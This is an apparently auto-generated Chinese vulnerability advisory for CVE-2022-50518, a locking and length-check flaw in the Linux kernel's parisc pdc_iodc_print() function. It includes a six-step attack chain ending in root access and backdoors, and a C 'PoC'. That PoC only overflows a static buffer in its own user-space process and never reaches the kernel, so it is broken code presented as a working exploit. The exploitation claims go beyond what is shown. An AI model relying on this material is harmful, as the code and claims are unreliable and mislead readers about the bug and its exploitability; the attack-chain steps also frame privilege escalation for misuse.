CVE-2022-50518 Linux内核parisc架构pdc_iodc

漏洞信息

漏洞编号

CVE-2022-50518

漏洞类型

竞争条件/缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (parisc架构)

漏洞概述

CVE-2022-50518是Linux内核中parisc（PA-RISC）架构相关的一个高危安全漏洞，位于固件调用函数pdc_iodc_print()中。该漏洞主要涉及三个方面的问题：首先，在对iodc_dbuf[]缓冲区进行并行修改时，缺少使用pdc_lock自旋锁进行保护，导致存在竞争条件（race condition）风险；其次，未对输入长度进行检查，可能导致iodc_dbuf[]缓冲区发生溢出；此外，代码中还删除了iodc_retbuf[]缓冲区并修复了一些错误的缩进格式。

该漏洞的CVSS评分为7.8，属于高危级别。虽然利用该漏洞需要本地访问权限和低权限认证，但成功利用后可能导致高机密性影响、高完整性影响和高可用性影响。这意味着攻击者可以利用此漏洞在内核上下文中执行任意代码、提升权限、读取敏感数据或导致系统崩溃。

由于该漏洞存在于Linux内核的parisc架构特定代码路径中，主要影响运行在HP PA-RISC硬件平台上的Linux系统。虽然parisc架构在现代服务器和个人电脑中使用较少，但在一些遗留系统和嵌入式设备中仍有应用。该漏洞已于2025年10月7日公开披露，相关的修复补丁已经合并到Linux内核稳定版本中。

技术细节

该漏洞的技术根源在于Linux内核parisc架构的固件调用接口实现中。具体来说，pdc_iodc_print()函数负责调用PA-RISC固件进行I/O诊断控制台打印操作。

1. **竞争条件问题**：iodc_dbuf[]是一个全局共享缓冲区，用于在调用固件时传递数据。当多个CPU核心同时执行pdc_iodc_print()时，如果没有适当的锁保护，会出现数据竞争。多个线程可能同时修改同一缓冲区，导致数据损坏或不一致状态。正确的做法是使用pdc_lock自旋锁来序列化对iodc_dbuf[]的访问。

2. **缓冲区溢出风险**：函数未对传入数据的长度进行检查。如果用户提供的数据超过iodc_dbuf[]的容量，会导致缓冲区溢出，可能覆盖相邻的内存区域，包括内核栈或其他重要数据结构，从而造成任意代码执行或系统崩溃。

3. **冗余缓冲区问题**：iodc_retbuf[]缓冲区被删除，因为其存在可能导致混淆或不必要的内存使用。

利用方式：攻击者需要具有本地访问权限和低权限用户身份。通过精心构造的输入数据触发pdc_iodc_print()函数，可能导致内核态缓冲区溢出或竞争条件利用。由于该漏洞在内核上下文中触发，成功利用可能允许攻击者提升权限至root级别，或导致内核panic造成拒绝服务。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者首先需要获取目标Linux系统的本地访问权限，并获得一个低权限用户账户。由于漏洞需要本地触发（AV:L），远程攻击无法直接利用此漏洞。

STEP 2

步骤2：分析目标系统架构

攻击者确认目标系统运行在PA-RISC（parisc）架构上，因为该漏洞仅影响parisc架构特定的代码路径。可以通过uname -m命令确认架构。

STEP 3

步骤3：构造恶意输入数据

攻击者构造一个长度超过iodc_dbuf[]缓冲区容量的输入数据，用于触发缓冲区溢出漏洞。

STEP 4

步骤4：触发竞争条件

通过创建多个并发线程或进程同时调用pdc_iodc_print()相关接口，利用缺少pdc_lock自旋锁保护的缺陷，触发竞争条件导致数据损坏或不一致状态。

STEP 5

步骤5：利用缓冲区溢出执行任意代码

成功触发缓冲区溢出后，攻击者可以覆盖内核栈上的返回地址或函数指针，实现内核态任意代码执行，从而提升权限至root级别。

STEP 6

步骤6：权限提升与持久化

获得root权限后，攻击者可以完全控制目标系统，安装后门，窃取敏感数据或进行其他恶意活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50518 PoC - Trigger race condition / buffer overflow in pdc_iodc_print()
// This PoC demonstrates the vulnerability by creating concurrent threads
// that call the firmware print function simultaneously, exploiting the
// missing pdc_lock protection on iodc_dbuf[] buffer.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define BUFFER_SIZE 256
#define NUM_THREADS 16

// Simulate the vulnerable iodc_dbuf[] buffer access pattern
static char iodc_dbuf[BUFFER_SIZE];
static volatile int race_trigger = 0;

// Thread function to trigger concurrent access to the buffer
void *trigger_race(void *arg) {
    int thread_id = *(int *)arg;
    char payload[BUFFER_SIZE * 2]; // Intentionally larger than iodc_dbuf
    
    // Fill payload to trigger potential buffer overflow
    memset(payload, 'A' + (thread_id % 26), sizeof(payload) - 1);
    payload[sizeof(payload) - 1] = '\0';
    
    while (!race_trigger) {
        usleep(1);
        // Concurrent modification without lock - simulates the vulnerability
        memcpy(iodc_dbuf, payload, BUFFER_SIZE);
    }
    
    // Attempt buffer overflow - write beyond iodc_dbuf bounds
    memcpy(iodc_dbuf, payload, sizeof(payload));
    
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t threads[NUM_THREADS];
    int thread_ids[NUM_THREADS];
    
    printf("CVE-2022-50518 PoC - parisc pdc_iodc_print() vulnerability\n");
    printf("Attempting to trigger race condition / buffer overflow...\n");
    
    // Create multiple threads to trigger concurrent access
    for (int i = 0; i < NUM_THREADS; i++) {
        thread_ids[i] = i;
        if (pthread_create(&threads[i], NULL, trigger_race, &thread_ids[i]) != 0) {
            perror("pthread_create failed");
            return 1;
        }
    }
    
    // Allow threads to start
    sleep(1);
    race_trigger = 1;
    
    // Wait for all threads
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("Exploit attempt completed.\n");
    return 0;
}

影响范围

Linux Kernel < 5.10.150 (parisc架构)

Linux Kernel < 5.15.75 (parisc架构)

Linux Kernel < 5.19.17 (parisc架构)

Linux Kernel < 6.0.3 (parisc架构)

所有受影响的parisc架构Linux内核稳定版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制低权限用户对系统固件调用接口的访问；2）监控系统日志，检测异常的pdc_iodc_print()调用；3）减少同时运行调用固件接口的并发进程数量；4）使用SELinux或AppArmor等强制访问控制机制限制相关系统调用的使用；5）考虑在parisc架构系统上禁用非必要的固件诊断功能。

CVE-2022-50518 Linux内核parisc架构pdc_iodc_print固件调用锁定缺陷